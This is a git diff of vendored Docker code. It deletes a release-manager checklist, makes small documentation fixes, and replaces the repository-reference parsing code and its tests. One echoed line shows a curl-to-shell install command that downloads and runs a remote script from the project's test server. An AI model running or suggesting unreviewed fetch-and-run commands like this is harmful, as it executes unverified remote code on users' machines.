-#### 2.1 Update the VERSION files
-
-Update the content of the `VERSION` file to be the next minor (incrementing Y)
-and add the `-dev` suffix. For example, after the release branch for 1.5.0 is
-created, the `VERSION` file gets updated to `1.6.0-dev` (as in "1.6.0 in the
-making").
-
-#### 2.2 Update API version on master
-
-We don't want API changes to go to the now frozen API version. Create a new
-entry in `docs/reference/api/` by copying the latest and bumping the version
-number (in both the file's name and content), and submit this in a PR against
-master.
-
-### 3. Update CHANGELOG.md
-
-You can run this command for reference with git 2.0:
-
-```bash
-git fetch --tags
-LAST_VERSION=$(git tag -l --sort=-version:refname "v*" | grep -E 'v[0-9\.]+$' | head -1)
-git log --stat $LAST_VERSION..bump_$VERSION
-```
-
-If you don't have git 2.0 but have a sort command that supports `-V`:
-```bash
-git fetch --tags
-LAST_VERSION=$(git tag -l | grep -E 'v[0-9\.]+$' | sort -rV | head -1)
-git log --stat $LAST_VERSION..bump_$VERSION
-```
-
-If releasing a major version (X or Y increased in vX.Y.Z), simply listing notable user-facing features is sufficient.
-```markdown
-#### Notable features since <last major version>
-* New docker command to do something useful
-* Engine API change (deprecating old version)
-* Performance improvements in some usecases
-* ...
-```
-
-For minor releases (only Z increases in vX.Y.Z), provide a list of user-facing changes.
-Each change should be listed under a category heading formatted as `#### CATEGORY`.
-
-`CATEGORY` should describe which part of the project is affected.
-  Valid categories are:
-  * Builder
-  * Documentation
-  * Hack
-  * Packaging
-  * Engine API
-  * Runtime
-  * Other (please use this category sparingly)
-
-Each change should be formatted as `BULLET DESCRIPTION`, given:
-
-* BULLET: either `-`, `+` or `*`, to indicate a bugfix, new feature or
-  upgrade, respectively.
-
-* DESCRIPTION: a concise description of the change that is relevant to the
-  end-user, using the present tense. Changes should be described in terms
-  of how they affect the user, for example "Add new feature X which allows Y",
-  "Fix bug which caused X", "Increase performance of Y".
-
-EXAMPLES:
-
-```markdown
-## 0.3.6 (1995-12-25)
-
-#### Builder
-
-+ 'docker build -t FOO .' applies the tag FOO to the newly built image
-
-#### Engine API
-
-- Fix a bug in the optional unix socket transport
-
-#### Runtime
-
-* Improve detection of kernel version
-```
-
-If you need a list of contributors between the last major release and the
-current bump branch, use something like:
-```bash
-git log --format='%aN <%aE>' v0.7.0...bump_v0.8.0 | sort -uf
-```
-Obviously, you'll need to adjust version numbers as necessary.  If you just need
-a count, add a simple `| wc -l`.
-
-### 4. Change the contents of the VERSION file
-
-Before the big thing, you'll want to make successive release candidates and get
-people to test. The release candidate number `N` should be part of the version:
-
-```bash
-export RC_VERSION=${VERSION}-rcN
-echo ${RC_VERSION#v} > VERSION
-```
-
-### 5. Test the docs
-
-Make sure that your tree includes documentation for any modified or
-new features, syntax or semantic changes.
-
-To test locally:
-
-```bash
-make docs
-```
-
-To make a shared test at https://beta-docs.docker.io:
-
-(You will need the `awsconfig` file added to the `docs/` dir)
-
-```bash
-make AWS_S3_BUCKET=beta-docs.docker.io BUILD_ROOT=yes docs-release
-```
-
-### 6. Commit and create a pull request to the "release" branch
-
-```bash
-git add VERSION CHANGELOG.md
-git commit -m "Bump version to $VERSION"
-git push $GITHUBUSER bump_$VERSION
-echo "https://github.com/$GITHUBUSER/docker/compare/docker:release/$BASE...$GITHUBUSER:bump_$VERSION?expand=1"
-```
-
-That last command will give you the proper link to visit to ensure that you
-open the PR against the "release" branch instead of accidentally against
-"master" (like so many brave souls before you already have).
-
-### 7. Create a PR to update the AUTHORS file for the release
-
-Update the AUTHORS file, by running the `hack/generate-authors.sh` on the
-release branch. To prevent duplicate entries, you may need to update the
-`.mailmap` file accordingly.
-
-### 8. Build release candidate rpms and debs
-
-**NOTE**: It will be a lot faster if you pass a different graphdriver with
-`DOCKER_GRAPHDRIVER` than `vfs`.
-
-```bash
-docker build -t docker .
-docker run \
-    --rm -t --privileged \
-    -e DOCKER_GRAPHDRIVER=aufs \
-    -v $(pwd)/bundles:/go/src/github.com/docker/docker/bundles \
-    docker \
-    hack/make.sh binary build-deb build-rpm
-```
-
-### 9. Publish release candidate rpms and debs
-
-With the rpms and debs you built from the last step you can release them on the
-same server, or ideally, move them to a dedicated release box via scp into
-another docker/docker directory in bundles. This next step assumes you have
-a checkout of the docker source code at the same commit you used to build, with
-the artifacts from the last step in `bundles`.
-
-**NOTE:** If you put a space before the command your `.bash_history` will not
-save it. (for the `GPG_PASSPHRASE`).
-
-```bash
-docker build -t docker .
-docker run --rm -it --privileged \
-    -v /volumes/repos:/volumes/repos \
-    -v $(pwd)/bundles:/go/src/github.com/docker/docker/bundles \
-    -v $HOME/.gnupg:/root/.gnupg \
-    -e DOCKER_RELEASE_DIR=/volumes/repos \
-    -e GPG_PASSPHRASE \
-    -e KEEPBUNDLE=1 \
-    docker \
-    hack/make.sh release-deb release-rpm sign-repos generate-index-listing
-```
-
-### 10. Upload the changed repos to wherever you host
-
-For example, above we bind mounted `/volumes/repos` as the storage for
-`DOCKER_RELEASE_DIR`. In this case `/volumes/repos/apt` can be synced with
-a specific s3 bucket for the apt repo and `/volumes/repos/yum` can be synced with
-a s3 bucket for the yum repo.
-
-### 11. Publish release candidate binaries
-
-To run this you will need access to the release credentials. Get them from the
-Core maintainers.
-
-```bash
-docker build -t docker .
-
-# static binaries are still pushed to s3
-docker run \
-    -e AWS_S3_BUCKET=test.docker.com \
-    -e AWS_ACCESS_KEY_ID \
-    -e AWS_SECRET_ACCESS_KEY \
-    -e AWS_DEFAULT_REGION \
-    -i -t --privileged \
-    docker \
-    hack/release.sh
-```
-
-It will run the test suite, build the binaries and upload to the specified bucket,
-so this is a good time to verify that you're running against **test**.docker.com.
-
-### 12. Purge the cache!
-
-After the binaries are uploaded to test.docker.com and the packages are on
-apt.dockerproject.org and yum.dockerproject.org, make sure
-they get tested in both Ubuntu and Debian for any obvious installation
-issues or runtime issues.
-
-If everything looks good, it's time to create a git tag for this candidate:
-
-```bash
-git tag -a $RC_VERSION -m $RC_VERSION bump_$VERSION
-git push origin $RC_VERSION
-```
-
-Announcing on multiple medias is the best way to get some help testing! An easy
-way to get some useful links for sharing:
-
-```bash
-echo "Ubuntu/Debian: curl -sSL https://test.docker.com/ | sh"
-echo "Linux 64bit binary: https://test.docker.com/builds/Linux/x86_64/docker-${VERSION#v}"
-echo "Darwin/OSX 64bit client binary: https://test.docker.com/builds/Darwin/x86_64/docker-${VERSION#v}"
-echo "Linux 64bit tgz: https://test.docker.com/builds/Linux/x86_64/docker-${VERSION#v}.tgz"
-echo "Windows 64bit client binary: https://test.docker.com/builds/Windows/x86_64/docker-${VERSION#v}.exe"
-echo "Windows 32bit client binary: https://test.docker.com/builds/Windows/i386/docker-${VERSION#v}.exe"
-```
-
-We recommend announcing the release candidate on:
-
-- IRC on #docker, #docker-dev, #docker-maintainers
-- In a comment on the pull request to notify subscribed people on GitHub
-- The [docker-dev](https://groups.google.com/forum/#!forum/docker-dev) group
-- The [docker-maintainers](https://groups.google.com/a/dockerproject.org/forum/#!forum/maintainers) group
-- Any social media that can bring some attention to the release candidate
-
-### 13. Iterate on successive release candidates
-
-Spend several days along with the community explicitly investing time and
-resources to try and break Docker in every possible way, documenting any
-findings pertinent to the release.  This time should be spent testing and
-finding ways in which the release might have caused various features or upgrade
-environments to have issues, not coding.  During this time, the release is in
-code freeze, and any additional code changes will be pushed out to the next
-release.
-
-It should include various levels of breaking Docker, beyond just using Docker
-by the book.
-
-Any issues found may still remain issues for this release, but they should be
-documented and give appropriate warnings.
-
-During this phase, the `bump_$VERSION` branch will keep evolving as you will
-produce new release candidates. The frequency of new candidates is up to the
-release manager: use your best judgement taking into account the severity of
-reported issues, testers availability, and time to scheduled release date.
-
-Each time you'll want to produce a new release candidate, you will start by
-adding commits to the branch, usually by cherry-picking from master:
-
-```bash
-git cherry-pick -s -x -m0 <commit_id>
-```
-
-You want your "bump commit" (the one that updates the CHANGELOG and VERSION
-files) to remain on top, so you'll have to `git rebase -i` to bring it back up.
-
-Now that your bump commit is back on top, you will need to update the CHANGELOG
-file (if appropriate for this particular release candidate), and update the
-VERSION file to increment the RC number:
-
-```bash
-export RC_VERSION=$VERSION-rcN
-echo $RC_VERSION > VERSION
-```
-
-You can now amend your last commit and update the bump branch:
-
-```bash
-git commit --amend
-git push -f $GITHUBUSER bump_$VERSION
-```
-
-Repeat step 6 to tag the code, publish new binaries, announce availability, and
-get help testing.
-
-### 14. Finalize the bump branch
-
-When you're happy with the quality of a release candidate, you can move on and
-create the real thing.
-
-You will first have to amend the "bump commit" to drop the release candidate
-suffix in the VERSION file:
-
-```bash
-echo $VERSION > VERSION
-git add VERSION
-git commit --amend
-```
-
-You will then repeat step 6 to publish the binaries to test
-
-### 15. Get 2 other maintainers to validate the pull request
-
-### 16. Build final rpms and debs
-
-```bash
-docker build -t docker .
-docker run \
-    --rm -t --privileged \
-    -v $(pwd)/bundles:/go/src/github.com/docker/docker/bundles \
-    docker \
-    hack/make.sh binary build-deb build-rpm
-```
-
-### 17. Publish final rpms and debs
-
-With the rpms and debs you built from the last step you can release them on the
-same server, or ideally, move them to a dedicated release box via scp into
-another docker/docker directory in bundles. This next step assumes you have
-a checkout of the docker source code at the same commit you used to build, with
-the artifacts from the last step in `bundles`.
-
-**NOTE:** If you put a space before the command your `.bash_history` will not
-save it. (for the `GPG_PASSPHRASE`).
-
-```bash
-docker build -t docker .
-docker run --rm -it --privileged \
-    -v /volumes/repos:/volumes/repos \
-    -v $(pwd)/bundles:/go/src/github.com/docker/docker/bundles \
-    -v $HOME/.gnupg:/root/.gnupg \
-    -e DOCKER_RELEASE_DIR=/volumes/repos \
-    -e GPG_PASSPHRASE \
-    -e KEEPBUNDLE=1 \
-    docker \
-    hack/make.sh release-deb release-rpm sign-repos generate-index-listing
-```
-
-### 18. Upload the changed repos to wherever you host
-
-For example, above we bind mounted `/volumes/repos` as the storage for
-`DOCKER_RELEASE_DIR`. In this case `/volumes/repos/apt` can be synced with
-a specific s3 bucket for the apt repo and `/volumes/repos/yum` can be synced with
-a s3 bucket for the yum repo.
-
-### 19. Publish final binaries
-
-Once they're tested and reasonably believed to be working, run against
-get.docker.com:
-
-```bash
-docker build -t docker .
-# static binaries are still pushed to s3
-docker run \
-    -e AWS_S3_BUCKET=get.docker.com \
-    -e AWS_ACCESS_KEY_ID \
-    -e AWS_SECRET_ACCESS_KEY \
-    -e AWS_DEFAULT_REGION \
-    -i -t --privileged \
-    docker \
-    hack/release.sh
-```
-
-### 20. Purge the cache!
-
-### 21. Apply tag and create release
-
-It's very important that we don't make the tag until after the official
-release is uploaded to get.docker.com!
-
-```bash
-git tag -a $VERSION -m $VERSION bump_$VERSION
-git push origin $VERSION
-```
-
-Once the tag is pushed, go to GitHub and create a [new release](https://github.com/docker/docker/releases/new).
-If the tag is for an RC make sure you check `This is a pre-release` at the bottom of the form.
-
-Select the tag that you just pushed as the version and paste the changelog in the description of the release.
-You can see examples in this two links:
-
-https://github.com/docker/docker/releases/tag/v1.8.0
-https://github.com/docker/docker/releases/tag/v1.8.0-rc3
-
-### 22. Go to github to merge the `bump_$VERSION` branch into release
-
-Don't forget to push that pretty blue button to delete the leftover
-branch afterwards!
-
-### 23. Update the docs branch
-
-You will need to point the docs branch to the newly created release tag:
-
-```bash
-git checkout origin/docs
-git reset --hard origin/$VERSION
-git push -f origin docs
-```
-
-The docs will appear on https://docs.docker.com/ (though there may be cached
-versions, so its worth checking http://docs.docker.com.s3-website-us-east-1.amazonaws.com/).
-For more information about documentation releases, see `docs/README.md`.
-
-Note that the new docs will not appear live on the site until the cache (a complex,
-distributed CDN system) is flushed. The `make docs-release` command will do this
-_if_ the `DISTRIBUTION_ID` is set correctly - this will take at least 15 minutes to run
-and you can check its progress with the CDN Cloudfront Chrome addon.
-
-### 24. Create a new pull request to merge your bump commit back into master
-
-```bash
-git checkout master
-git fetch
-git reset --hard origin/master
-git cherry-pick -s -x $VERSION
-git push $GITHUBUSER merge_release_$VERSION
-echo "https://github.com/$GITHUBUSER/docker/compare/docker:master...$GITHUBUSER:merge_release_$VERSION?expand=1"
-```
-
-Again, get two maintainers to validate, then merge, then push that pretty
-blue button to delete your branch.
-
-### 25. Rejoice and Evangelize!
-
-Congratulations! You're done.
-
-Go forth and announce the glad tidings of the new release in `#docker`,
-`#docker-dev`, on the [dev mailing list](https://groups.google.com/forum/#!forum/docker-dev),
-the [announce mailing list](https://groups.google.com/forum/#!forum/docker-announce),
-and on Twitter!
diff --git a/vendor/github.com/docker/docker/project/RELEASE-PROCESS.md b/vendor/github.com/docker/docker/project/RELEASE-PROCESS.md
index d764e9d007..8270a6efb3 100644
--- a/vendor/github.com/docker/docker/project/RELEASE-PROCESS.md
+++ b/vendor/github.com/docker/docker/project/RELEASE-PROCESS.md
@@ -45,7 +45,7 @@ defined by a ROADMAP.md file at the root of the repository).
 - The earlier a PR is opened, the more time the maintainers have to review. For
 example, if a PR is opened the day before the freeze date, it’s very unlikely
 that it will be merged for the release.
-- Constant communication with the maintainers (mailing-list, IRC, Github issues,
+- Constant communication with the maintainers (mailing-list, IRC, GitHub issues,
 etc.) allows to get early feedback on the design before getting into the
 implementation, which usually reduces the time needed to discuss a changeset.
 - If the code is commented, fully tested and by extension follows every single
diff --git a/vendor/github.com/docker/docker/project/REVIEWING.md b/vendor/github.com/docker/docker/project/REVIEWING.md
index 51ef4c59de..cac3f5d7d4 100644
--- a/vendor/github.com/docker/docker/project/REVIEWING.md
+++ b/vendor/github.com/docker/docker/project/REVIEWING.md
@@ -68,7 +68,7 @@ the next appropriate stage:
 
  - Has DCO
  - Contains sufficient justification (e.g., usecases) for the proposed change
- - References the Github issue it fixes (if any) in the commit or the first Github comment
+ - References the GitHub issue it fixes (if any) in the commit or the first GitHub comment
 
 Possible transitions from this state:
 
diff --git a/vendor/github.com/docker/docker/project/TOOLS.md b/vendor/github.com/docker/docker/project/TOOLS.md
index 26303c3021..dda0fc0342 100644
--- a/vendor/github.com/docker/docker/project/TOOLS.md
+++ b/vendor/github.com/docker/docker/project/TOOLS.md
@@ -17,7 +17,7 @@ GitHub pull requests. Leeroy uses
 [GitHub hooks](https://developer.github.com/v3/repos/hooks/) 
 to listen for pull request notifications and starts jobs on your Jenkins 
 server.  Using the Jenkins
-[notification plugin][https://wiki.jenkins-ci.org/display/JENKINS/Notification+Plugin],
+[notification plugin](https://wiki.jenkins-ci.org/display/JENKINS/Notification+Plugin),
 Leeroy updates the pull request using GitHub's 
 [status API](https://developer.github.com/v3/repos/statuses/)
 with pending, success, failure, or error statuses.
diff --git a/vendor/github.com/docker/docker/reference/errors.go b/vendor/github.com/docker/docker/reference/errors.go
new file mode 100644
index 0000000000..2d294c672e
--- /dev/null
+++ b/vendor/github.com/docker/docker/reference/errors.go
@@ -0,0 +1,25 @@
+package reference // import "github.com/docker/docker/reference"
+
+type notFoundError string
+
+func (e notFoundError) Error() string {
+	return string(e)
+}
+
+func (notFoundError) NotFound() {}
+
+type invalidTagError string
+
+func (e invalidTagError) Error() string {
+	return string(e)
+}
+
+func (invalidTagError) InvalidParameter() {}
+
+type conflictingTagError string
+
+func (e conflictingTagError) Error() string {
+	return string(e)
+}
+
+func (conflictingTagError) Conflict() {}
diff --git a/vendor/github.com/docker/docker/reference/reference.go b/vendor/github.com/docker/docker/reference/reference.go
deleted file mode 100644
index 996fc50704..0000000000
--- a/vendor/github.com/docker/docker/reference/reference.go
+++ /dev/null
@@ -1,216 +0,0 @@
-package reference
-
-import (
-	"errors"
-	"fmt"
-	"strings"
-
-	"github.com/docker/distribution/digest"
-	distreference "github.com/docker/distribution/reference"
-	"github.com/docker/docker/image/v1"
-)
-
-const (
-	// DefaultTag defines the default tag used when performing images related actions and no tag or digest is specified
-	DefaultTag = "latest"
-	// DefaultHostname is the default built-in hostname
-	DefaultHostname = "docker.io"
-	// LegacyDefaultHostname is automatically converted to DefaultHostname
-	LegacyDefaultHostname = "index.docker.io"
-	// DefaultRepoPrefix is the prefix used for default repositories in default host
-	DefaultRepoPrefix = "library/"
-)
-
-// Named is an object with a full name
-type Named interface {
-	// Name returns normalized repository name, like "ubuntu".
-	Name() string
-	// String returns full reference, like "ubuntu@sha256:abcdef..."
-	String() string
-	// FullName returns full repository name with hostname, like "docker.io/library/ubuntu"
-	FullName() string
-	// Hostname returns hostname for the reference, like "docker.io"
-	Hostname() string
-	// RemoteName returns the repository component of the full name, like "library/ubuntu"
-	RemoteName() string
-}
-
-// NamedTagged is an object including a name and tag.
-type NamedTagged interface {
-	Named
-	Tag() string
-}
-
-// Canonical reference is an object with a fully unique
-// name including a name with hostname and digest
-type Canonical interface {
-	Named
-	Digest() digest.Digest
-}
-
-// ParseNamed parses s and returns a syntactically valid reference implementing
-// the Named interface. The reference must have a name, otherwise an error is
-// returned.
-// If an error was encountered it is returned, along with a nil Reference.
-func ParseNamed(s string) (Named, error) {
-	named, err := distreference.ParseNamed(s)
-	if err != nil {
-		return nil, fmt.Errorf("Error parsing reference: %q is not a valid repository/tag: %s", s, err)
-	}
-	r, err := WithName(named.Name())
-	if err != nil {
-		return nil, err
-	}
-	if canonical, isCanonical := named.(distreference.Canonical); isCanonical {
-		return WithDigest(r, canonical.Digest())
-	}
-	if tagged, isTagged := named.(distreference.NamedTagged); isTagged {
-		return WithTag(r, tagged.Tag())
-	}
-	return r, nil
-}
-
-// TrimNamed removes any tag or digest from the named reference
-func TrimNamed(ref Named) Named {
-	return &namedRef{distreference.TrimNamed(ref)}
-}
-
-// WithName returns a named object representing the given string. If the input
-// is invalid ErrReferenceInvalidFormat will be returned.
-func WithName(name string) (Named, error) {
-	name, err := normalize(name)
-	if err != nil {
-		return nil, err
-	}
-	if err := validateName(name); err != nil {
-		return nil, err
-	}
-	r, err := distreference.WithName(name)
-	if err != nil {
-		return nil, err
-	}
-	return &namedRef{r}, nil
-}
-
-// WithTag combines the name from "name" and the tag from "tag" to form a
-// reference incorporating both the name and the tag.
-func WithTag(name Named, tag string) (NamedTagged, error) {
-	r, err := distreference.WithTag(name, tag)
-	if err != nil {
-		return nil, err
-	}
-	return &taggedRef{namedRef{r}}, nil
-}
-
-// WithDigest combines the name from "name" and the digest from "digest" to form
-// a reference incorporating both the name and the digest.
-func WithDigest(name Named, digest digest.Digest) (Canonical, error) {
-	r, err := distreference.WithDigest(name, digest)
-	if err != nil {
-		return nil, err
-	}
-	return &canonicalRef{namedRef{r}}, nil
-}
-
-type namedRef struct {
-	distreference.Named
-}
-type taggedRef struct {
-	namedRef
-}
-type canonicalRef struct {
-	namedRef
-}
-
-func (r *namedRef) FullName() string {
-	hostname, remoteName := splitHostname(r.Name())
-	return hostname + "/" + remoteName
-}
-func (r *namedRef) Hostname() string {
-	hostname, _ := splitHostname(r.Name())
-	return hostname
-}
-func (r *namedRef) RemoteName() string {
-	_, remoteName := splitHostname(r.Name())
-	return remoteName
-}
-func (r *taggedRef) Tag() string {
-	return r.namedRef.Named.(distreference.NamedTagged).Tag()
-}
-func (r *canonicalRef) Digest() digest.Digest {
-	return r.namedRef.Named.(distreference.Canonical).Digest()
-}
-
-// WithDefaultTag adds a default tag to a reference if it only has a repo name.
-func WithDefaultTag(ref Named) Named {
-	if IsNameOnly(ref) {
-		ref, _ = WithTag(ref, DefaultTag)
-	}
-	return ref
-}
-
-// IsNameOnly returns true if reference only contains a repo name.
-func IsNameOnly(ref Named) bool {
-	if _, ok := ref.(NamedTagged); ok {
-		return false
-	}
-	if _, ok := ref.(Canonical); ok {
-		return false
-	}
-	return true
-}
-
-// ParseIDOrReference parses string for an image ID or a reference. ID can be
-// without a default prefix.
-func ParseIDOrReference(idOrRef string) (digest.Digest, Named, error) {
-	if err := v1.ValidateID(idOrRef); err == nil {
-		idOrRef = "sha256:" + idOrRef
-	}
-	if dgst, err := digest.ParseDigest(idOrRef); err == nil {
-		return dgst, nil, nil
-	}
-	ref, err := ParseNamed(idOrRef)
-	return "", ref, err
-}
-
-// splitHostname splits a repository name to hostname and remotename string.
-// If no valid hostname is found, the default hostname is used. Repository name
-// needs to be already validated before.
-func splitHostname(name string) (hostname, remoteName string) {
-	i := strings.IndexRune(name, '/')
-	if i == -1 || (!strings.ContainsAny(name[:i], ".:") && name[:i] != "localhost") {
-		hostname, remoteName = DefaultHostname, name
-	} else {
-		hostname, remoteName = name[:i], name[i+1:]
-	}
-	if hostname == LegacyDefaultHostname {
-		hostname = DefaultHostname
-	}
-	if hostname == DefaultHostname && !strings.ContainsRune(remoteName, '/') {
-		remoteName = DefaultRepoPrefix + remoteName
-	}
-	return
-}
-
-// normalize returns a repository name in its normalized form, meaning it
-// will not contain default hostname nor library/ prefix for official images.
-func normalize(name string) (string, error) {
-	host, remoteName := splitHostname(name)
-	if strings.ToLower(remoteName) != remoteName {
-		return "", errors.New("invalid reference format: repository name must be lowercase")
-	}
-	if host == DefaultHostname {
-		if strings.HasPrefix(remoteName, DefaultRepoPrefix) {
-			return strings.TrimPrefix(remoteName, DefaultRepoPrefix), nil
-		}
-		return remoteName, nil
-	}
-	return name, nil
-}
-
-func validateName(name string) error {
-	if err := v1.ValidateID(name); err == nil {
-		return fmt.Errorf("Invalid repository name (%s), cannot specify 64-byte hexadecimal strings", name)
-	}
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/reference/reference_test.go b/vendor/github.com/docker/docker/reference/reference_test.go
deleted file mode 100644
index ff35ba3da2..0000000000
--- a/vendor/github.com/docker/docker/reference/reference_test.go
+++ /dev/null
@@ -1,275 +0,0 @@
-package reference
-
-import (
-	"testing"
-
-	"github.com/docker/distribution/digest"
-)
-
-func TestValidateReferenceName(t *testing.T) {
-	validRepoNames := []string{
-		"docker/docker",
-		"library/debian",
-		"debian",
-		"docker.io/docker/docker",
-		"docker.io/library/debian",
-		"docker.io/debian",
-		"index.docker.io/docker/docker",
-		"index.docker.io/library/debian",
-		"index.docker.io/debian",
-		"127.0.0.1:5000/docker/docker",
-		"127.0.0.1:5000/library/debian",
-		"127.0.0.1:5000/debian",
-		"thisisthesongthatneverendsitgoesonandonandonthisisthesongthatnev",
-	}
-	invalidRepoNames := []string{
-		"https://github.com/docker/docker",
-		"docker/Docker",
-		"-docker",
-		"-docker/docker",
-		"-docker.io/docker/docker",
-		"docker///docker",
-		"docker.io/docker/Docker",
-		"docker.io/docker///docker",
-		"1a3f5e7d9c1b3a5f7e9d1c3b5a7f9e1d3c5b7a9f1e3d5d7c9b1a3f5e7d9c1b3a",
-		"docker.io/1a3f5e7d9c1b3a5f7e9d1c3b5a7f9e1d3c5b7a9f1e3d5d7c9b1a3f5e7d9c1b3a",
-	}
-
-	for _, name := range invalidRepoNames {
-		_, err := ParseNamed(name)
-		if err == nil {
-			t.Fatalf("Expected invalid repo name for %q", name)
-		}
-	}
-
-	for _, name := range validRepoNames {
-		_, err := ParseNamed(name)
-		if err != nil {
-			t.Fatalf("Error parsing repo name %s, got: %q", name, err)
-		}
-	}
-}
-
-func TestValidateRemoteName(t *testing.T) {
-	validRepositoryNames := []string{
-		// Sanity check.
-		"docker/docker",
-
-		// Allow 64-character non-hexadecimal names (hexadecimal names are forbidden).
-		"thisisthesongthatneverendsitgoesonandonandonthisisthesongthatnev",
-
-		// Allow embedded hyphens.
-		"docker-rules/docker",
-
-		// Allow multiple hyphens as well.
-		"docker---rules/docker",
-
-		//Username doc and image name docker being tested.
-		"doc/docker",
-
-		// single character names are now allowed.
-		"d/docker",
-		"jess/t",
-
-		// Consecutive underscores.
-		"dock__er/docker",
-	}
-	for _, repositoryName := range validRepositoryNames {
-		_, err := ParseNamed(repositoryName)
-		if err != nil {
-			t.Errorf("Repository name should be valid: %v. Error: %v", repositoryName, err)
-		}
-	}
-
-	invalidRepositoryNames := []string{
-		// Disallow capital letters.
-		"docker/Docker",
-
-		// Only allow one slash.
-		"docker///docker",
-
-		// Disallow 64-character hexadecimal.
-		"1a3f5e7d9c1b3a5f7e9d1c3b5a7f9e1d3c5b7a9f1e3d5d7c9b1a3f5e7d9c1b3a",
-
-		// Disallow leading and trailing hyphens in namespace.
-		"-docker/docker",
-		"docker-/docker",
-		"-docker-/docker",
-
-		// Don't allow underscores everywhere (as opposed to hyphens).
-		"____/____",
-
-		"_docker/_docker",
-
-		// Disallow consecutive periods.
-		"dock..er/docker",
-		"dock_.er/docker",
-		"dock-.er/docker",
-
-		// No repository.
-		"docker/",
-
-		//namespace too long
-		"this_is_not_a_valid_namespace_because_its_lenth_is_greater_than_255_this_is_not_a_valid_namespace_because_its_lenth_is_greater_than_255_this_is_not_a_valid_namespace_because_its_lenth_is_greater_than_255_this_is_not_a_valid_namespace_because_its_lenth_is_greater_than_255/docker",
-	}
-	for _, repositoryName := range invalidRepositoryNames {
-		if _, err := ParseNamed(repositoryName); err == nil {
-			t.Errorf("Repository name should be invalid: %v", repositoryName)
-		}
-	}
-}
-
-func TestParseRepositoryInfo(t *testing.T) {
-	type tcase struct {
-		RemoteName, NormalizedName, FullName, AmbiguousName, Hostname string
-	}
-
-	tcases := []tcase{
-		{
-			RemoteName:     "fooo/bar",
-			NormalizedName: "fooo/bar",
-			FullName:       "docker.io/fooo/bar",
-			AmbiguousName:  "index.docker.io/fooo/bar",
-			Hostname:       "docker.io",
-		},
-		{
-			RemoteName:     "library/ubuntu",
-			NormalizedName: "ubuntu",
-			FullName:       "docker.io/library/ubuntu",
-			AmbiguousName:  "library/ubuntu",
-			Hostname:       "docker.io",
-		},
-		{
-			RemoteName:     "nonlibrary/ubuntu",
-			NormalizedName: "nonlibrary/ubuntu",
-			FullName:       "docker.io/nonlibrary/ubuntu",
-			AmbiguousName:  "",
-			Hostname:       "docker.io",
-		},
-		{
-			RemoteName:     "other/library",
-			NormalizedName: "other/library",
-			FullName:       "docker.io/other/library",
-			AmbiguousName:  "",
-			Hostname:       "docker.io",
-		},
-		{
-			RemoteName:     "private/moonbase",
-			NormalizedName: "127.0.0.1:8000/private/moonbase",
-			FullName:       "127.0.0.1:8000/private/moonbase",
-			AmbiguousName:  "",
-			Hostname:       "127.0.0.1:8000",
-		},
-		{
-			RemoteName:     "privatebase",
-			NormalizedName: "127.0.0.1:8000/privatebase",
-			FullName:       "127.0.0.1:8000/privatebase",
-			AmbiguousName:  "",
-			Hostname:       "127.0.0.1:8000",
-		},
-		{
-			RemoteName:     "private/moonbase",
-			NormalizedName: "example.com/private/moonbase",
-			FullName:       "example.com/private/moonbase",
-			AmbiguousName:  "",
-			Hostname:       "example.com",
-		},
-		{
-			RemoteName:     "privatebase",
-			NormalizedName: "example.com/privatebase",
-			FullName:       "example.com/privatebase",
-			AmbiguousName:  "",
-			Hostname:       "example.com",
-		},
-		{
-			RemoteName:     "private/moonbase",
-			NormalizedName: "example.com:8000/private/moonbase",
-			FullName:       "example.com:8000/private/moonbase",
-			AmbiguousName:  "",
-			Hostname:       "example.com:8000",
-		},
-		{
-			RemoteName:     "privatebasee",
-			NormalizedName: "example.com:8000/privatebasee",
-			FullName:       "example.com:8000/privatebasee",
-			AmbiguousName:  "",
-			Hostname:       "example.com:8000",
-		},
-		{
-			RemoteName:     "library/ubuntu-12.04-base",
-			NormalizedName: "ubuntu-12.04-base",
-			FullName:       "docker.io/library/ubuntu-12.04-base",
-			AmbiguousName:  "index.docker.io/library/ubuntu-12.04-base",
-			Hostname:       "docker.io",
-		},
-	}
-
-	for _, tcase := range tcases {
-		refStrings := []string{tcase.NormalizedName, tcase.FullName}
-		if tcase.AmbiguousName != "" {
-			refStrings = append(refStrings, tcase.AmbiguousName)
-		}
-
-		var refs []Named
-		for _, r := range refStrings {
-			named, err := ParseNamed(r)
-			if err != nil {
-				t.Fatal(err)
-			}
-			refs = append(refs, named)
-			named, err = WithName(r)
-			if err != nil {
-				t.Fatal(err)
-			}
-			refs = append(refs, named)
-		}
-
-		for _, r := range refs {
-			if expected, actual := tcase.NormalizedName, r.Name(); expected != actual {
-				t.Fatalf("Invalid normalized reference for %q. Expected %q, got %q", r, expected, actual)
-			}
-			if expected, actual := tcase.FullName, r.FullName(); expected != actual {
-				t.Fatalf("Invalid normalized reference for %q. Expected %q, got %q", r, expected, actual)
-			}
-			if expected, actual := tcase.Hostname, r.Hostname(); expected != actual {
-				t.Fatalf("Invalid hostname for %q. Expected %q, got %q", r, expected, actual)
-			}
-			if expected, actual := tcase.RemoteName, r.RemoteName(); expected != actual {
-				t.Fatalf("Invalid remoteName for %q. Expected %q, got %q", r, expected, actual)
-			}
-
-		}
-	}
-}
-
-func TestParseReferenceWithTagAndDigest(t *testing.T) {
-	ref, err := ParseNamed("busybox:latest@sha256:86e0e091d0da6bde2456dbb48306f3956bbeb2eae1b5b9a43045843f69fe4aaa")
-	if err != nil {
-		t.Fatal(err)
-	}
-	if _, isTagged := ref.(NamedTagged); isTagged {
-		t.Fatalf("Reference from %q should not support tag", ref)
-	}
-	if _, isCanonical := ref.(Canonical); !isCanonical {
-		t.Fatalf("Reference from %q should not support digest", ref)
-	}
-	if expected, actual := "busybox@sha256:86e0e091d0da6bde2456dbb48306f3956bbeb2eae1b5b9a43045843f69fe4aaa", ref.String(); actual != expected {
-		t.Fatalf("Invalid parsed reference for %q: expected %q, got %q", ref, expected, actual)
-	}
-}
-
-func TestInvalidReferenceComponents(t *testing.T) {
-	if _, err := WithName("-foo"); err == nil {
-		t.Fatal("Expected WithName to detect invalid name")
-	}
-	ref, err := WithName("busybox")
-	if err != nil {
-		t.Fatal(err)
-	}
-	if _, err := WithTag(ref, "-foo"); err == nil {
-		t.Fatal("Expected WithName to detect invalid tag")
-	}
-	if _, err := WithDigest(ref, digest.Digest("foo")); err == nil {
-		t.Fatal("Expected WithName to detect invalid digest")
-	}
-}
diff --git a/vendor/github.com/docker/docker/reference/store.go b/vendor/github.com/docker/docker/reference/store.go
index 71ca236c9c..b01051bf58 100644
--- a/vendor/github.com/docker/docker/reference/store.go
